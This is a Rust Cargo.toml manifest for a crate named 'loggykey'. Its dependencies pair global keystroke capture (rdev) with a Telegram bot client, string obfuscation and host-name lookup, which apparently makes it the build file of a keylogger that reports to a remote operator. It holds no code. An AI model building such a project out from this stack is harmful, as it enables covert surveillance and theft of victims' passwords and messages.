[package]
name = "loggykey"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[profile.release]
opt-level = "s"
lto = true
panic = "abort"

[dependencies]
gethostname = "0.5.0"
obfstr = "0.4.3"
rdev = "0.5.3"
teloxide = { version = "0.13.0", features = ["macros", "rustls", "ctrlc_handler"], default-features = false }
tokio = { version = "1.35.0", features = ["rt-multi-thread", "macros"] }
webbrowser = "1.0.3"